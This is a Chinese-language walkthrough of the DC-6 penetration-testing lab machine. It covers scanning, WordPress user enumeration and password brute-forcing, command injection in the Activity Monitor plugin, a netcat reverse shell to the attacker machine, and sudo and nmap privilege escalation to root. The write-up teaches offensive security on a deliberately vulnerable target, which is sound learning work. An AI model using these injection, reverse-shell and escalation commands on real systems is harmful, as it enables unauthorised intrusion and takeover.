DC-6 靶场渗透测试详细解析<\/h1>

环境搭建<\/h2>

攻击机<\/strong>: Kali Linux

IP地址: 192.168.200.14<\/li> <\/ul> <\/li>
靶机<\/strong>: DC-6

初始IP未知<\/li> <\/ul> <\/li>
网络配置<\/strong>: 确保两台机器使用相同的网络适配器模式<\/li> <\/ul>
信息收集阶段<\/h2>
1. 发现靶机IP<\/h3>
使用三种方法探测同网段存活主机:<\/p>
# 方法1: arp扫描<\/span> <\/span><\/span>arp-scan -l <\/span><\/span> <\/span><\/span># 方法2: netdiscover扫描<\/span> <\/span><\/span>netdiscover -i eth0 -r 192.168.200.0\/24 <\/span><\/span> <\/span><\/span># 方法3: nmap ping扫描<\/span> <\/span><\/span>nmap -sP 192.168.200.0\/24 -T4 <\/span><\/span><\/code><\/pre>发现靶机IP: 192.168.200.7<\/p> 2. 端口扫描与服务识别<\/h3> nmap -sS -A 192.168.200.7 -p 1-65535 <\/span><\/span><\/code><\/pre>扫描结果:<\/p> 开放端口: 80(HTTP), 22(SSH)<\/li> 访问80端口发现网站被重定向到wordy<\/li> <\/ul> 3. 配置hosts文件<\/h3> 在Kali的\/etc\/hosts<\/code>文件中添加:<\/p> 192.168.200.7 wordy <\/code><\/pre> 4. 识别CMS系统<\/h3> 访问网站后发现使用WordPress 5.1.1<\/p> 5. 目录扫描<\/h3> 使用dirb扫描网站目录:<\/p> dirb http:\/\/192.168.200.7\/ <\/span><\/span><\/code><\/pre>发现WordPress后台管理界面<\/p> 漏洞利用阶段<\/h2> 1. WordPress用户枚举<\/h3> 使用wpscan枚举用户名:<\/p> wpscan --url http:\/\/wordy -e u <\/span><\/span><\/code><\/pre>将发现的用户名保存到user.txt文件<\/p> 2. 密码字典生成<\/h3> 从rockyou.txt中筛选包含"k01"的密码:<\/p> cat \/usr\/share\/wordlists\/rockyou.txt | grep k01 > pwd.txt <\/span><\/span><\/code><\/pre>3. WordPress爆破登录<\/h3> 使用wpscan进行爆破:<\/p> wpscan --url wordy -U user.txt -P pwd.txt <\/span><\/span><\/code><\/pre>成功获取凭证:<\/p> 用户名: mark<\/li> 密码: helpdesk01<\/li> <\/ul> 4. 登录WordPress后台<\/h3> 发现两个重要线索:<\/p> 网站使用了Activity Monitor工具<\/li> Activity Monitor的Tools栏存在可注入点<\/li> <\/ol> 5. 命令注入漏洞利用<\/h3> 在Activity Monitor的Tools栏输入测试域名(qquhu.com)，使用Burp Suite抓包<\/p> 发现管道符后的命令被执行:<\/p> qq.com | whoami <\/code><\/pre> 6. 反弹Shell<\/h3> 在Kali上开启监听:<\/p> nc -lvvp 6666<\/span> <\/span><\/span><\/code><\/pre>修改Burp请求为:<\/p> qq.com | nc -e \/bin\/bash 192.168.200.14 6666 <\/code><\/pre> 成功获取反向连接后，升级为交互式shell:<\/p> python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre>权限提升阶段<\/h2> 1. 查找敏感信息<\/h3> 在\/home\/mark目录下发现things-to-do文件，包含graham的凭据<\/p> 2. SSH登录graham账户<\/h3> ssh graham@192.168.200.7 <\/span><\/span><\/code><\/pre>3. 检查sudo权限<\/h3> sudo -l <\/span><\/span><\/code><\/pre>输出:<\/p> User graham may run the following commands on dc-6: (jens) NOPASSWD: \/home\/jens\/backups.sh <\/code><\/pre> 4. 利用backups.sh提权<\/h3> echo "\/bin\/bash"<\/span> >> \/home\/jens\/backups.sh <\/span><\/span>sudo -u jens \/home\/jens\/backups.sh <\/span><\/span><\/code><\/pre>成功切换到jens用户<\/p> 5. 检查jens的sudo权限<\/h3> sudo -l <\/span><\/span><\/code><\/pre>输出:<\/p> User jens may run the following commands on dc-6: (root) NOPASSWD: \/usr\/bin\/nmap <\/code><\/pre> 6. 利用nmap提权<\/h3> 创建提权脚本:<\/p> echo "os.execute('\/bin\/bash')"<\/span> > getshell <\/span><\/span><\/code><\/pre>使用nmap以root权限执行:<\/p> sudo nmap --script=<\/span>getshell <\/span><\/span><\/code><\/pre>成功获取root权限<\/p> 获取flag<\/h2> 在\/root目录下找到最终的flag文件<\/p> 总结<\/h2> 本渗透测试完整流程:<\/p> 网络发现 → 2. 端口扫描 → 3. Web应用识别 → 4. 目录爆破 → 5. 用户枚举 → 6. 密码爆破 → 7. 后台登录 → 8. 命令注入 → 9. 反弹Shell → 10. 信息收集 → 11. 横向移动 → 12. 权限提升 → 13. 获取flag<\/li> <\/ol> 关键点:<\/p> WordPress用户枚举与密码爆破<\/li> Activity Monitor插件的命令注入漏洞<\/li> 通过sudo权限配置的提权路径<\/li> nmap的交互模式提权技术<\/li> <\/ul>